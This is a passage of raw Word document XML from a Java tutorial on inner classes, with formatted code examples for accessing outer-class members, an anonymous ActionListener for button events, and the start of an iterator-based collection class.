          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InnerClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AFD04" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> printMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0975FE" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Accessing outer class's private member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19006E90" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E4342" w14:textId="77777777" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B647E" w14:textId="1AAB24C4" w:rsidR="00C9136F" w:rsidRPr="00C9136F" w:rsidRDefault="00C9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0044932"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9136F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F6AA0" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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Event Handling and Callback Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A604E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ner classes are commonly used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Swing</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JavaFX</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for GUI applications) to define event listeners or callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD648F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nonymous inner classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used to implement interfaces or extend classes for event handling, which helps in keeping event handling logic within the context of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC77BB8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="0023650C" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711B8B6"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8607"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addActionListener</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ActionListener</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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2DE80811"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8607"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> actionPerformed</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ActionEvent</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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398A47DF"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8607"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Button clicked!"</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F40BBC"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8607"/>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6B65916B" w14:textId="0B57C6CC"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8607"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49261CDD" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E488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Iteration and Traversing Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E2FE3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39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ner classes can be used to implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in collection classes. For example, a collection class may have an inner class that implements the Iterator interface, and this class can traverse or manipulate the data in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EFFCFE" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="0023650C" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B604CF"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946556"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyCollection</w:t>
      </w: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15F7B145"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946556"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> data </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
